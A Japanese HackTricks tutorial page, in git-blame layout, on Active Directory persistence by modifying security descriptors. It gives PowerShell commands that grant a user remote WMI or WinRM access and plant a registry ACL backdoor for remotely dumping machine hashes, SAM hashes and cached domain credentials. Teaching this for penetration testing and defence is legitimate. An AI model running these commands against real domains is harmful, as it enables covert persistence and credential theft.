2023-07-07 23:42:27 +00:00
|
|
|
|
# セキュリティディスクリプタ
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
## セキュリティディスクリプタ
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
セキュリティディスクリプタ定義言語(SDDL)は、セキュリティディスクリプタを記述するために使用される形式を定義します。SDDLは、DACLとSACLにACE文字列を使用します:`ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;`
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**セキュリティディスクリプタ**は、**オブジェクト**が**オブジェクト**に対して持つ**許可**を**格納**するために使用されます。オブジェクトのセキュリティディスクリプタにわずかな変更を加えることができれば、特権のあるグループのメンバーである必要なく、そのオブジェクトに対して非常に興味深い特権を得ることができます。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
したがって、この永続化技術は、特定のオブジェクトに対して必要なすべての特権を獲得し、通常は管理者特権が必要なタスクを管理者でなくても実行できる能力に基づいています。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
### WMIへのアクセス
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
ユーザーに**リモートでWMIを実行する権限**を与えることができます。[**こちらを使用してください**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1):
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
|
|
|
|
|
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
### WinRMへのアクセス
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
[**こちら**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)を使用して、ユーザーに**winrm PSコンソールへのアクセスを許可**します。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
|
|
|
|
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
|
|
|
|
|
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
### ハッシュへのリモートアクセス
|
2020-07-15 15:43:14 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
**レジストリ**にアクセスし、**ハッシュをダンプ**して、[**DAMP**](https://github.com/HarmJ0y/DAMP)**を使用して**レジストリのバックドアを作成**します。これにより、いつでも**コンピュータのハッシュ**、**SAM**、およびコンピュータにキャッシュされた**ADの資格情報**を取得できます。したがって、**ドメインコントローラコンピュータに対して通常のユーザにこの権限を与える**のは非常に便利です。
|
2020-07-15 15:43:14 +00:00
|
|
|
|
```bash
|
2022-08-15 19:31:10 +00:00
|
|
|
|
# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
|
2020-07-15 15:43:14 +00:00
|
|
|
|
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
|
2022-08-15 19:31:10 +00:00
|
|
|
|
|
|
|
|
|
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
|
2020-07-15 15:43:14 +00:00
|
|
|
|
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose
|
2022-08-15 19:31:10 +00:00
|
|
|
|
|
|
|
|
|
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
|
2020-07-15 15:43:14 +00:00
|
|
|
|
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose
|
2022-08-15 19:31:10 +00:00
|
|
|
|
|
|
|
|
|
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
|
2020-07-15 15:43:14 +00:00
|
|
|
|
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
|
|
|
|
|
```
|
2023-07-07 23:42:27 +00:00
|
|
|
|
[**Silver Tickets**](silver-ticket.md)をチェックして、ドメインコントローラーのコンピューターアカウントのハッシュを使用する方法を学びましょう。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
<details>
|
|
|
|
|
|
2023-04-25 18:35:28 +00:00
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **サイバーセキュリティ会社で働いていますか?** HackTricksで**会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手**したいですか?または、HackTricksを**PDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
2023-07-07 23:42:27 +00:00
|
|
|
|
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
2022-04-28 16:01:33 +00:00
|
|
|
|
|
|
|
|
|
</details>
|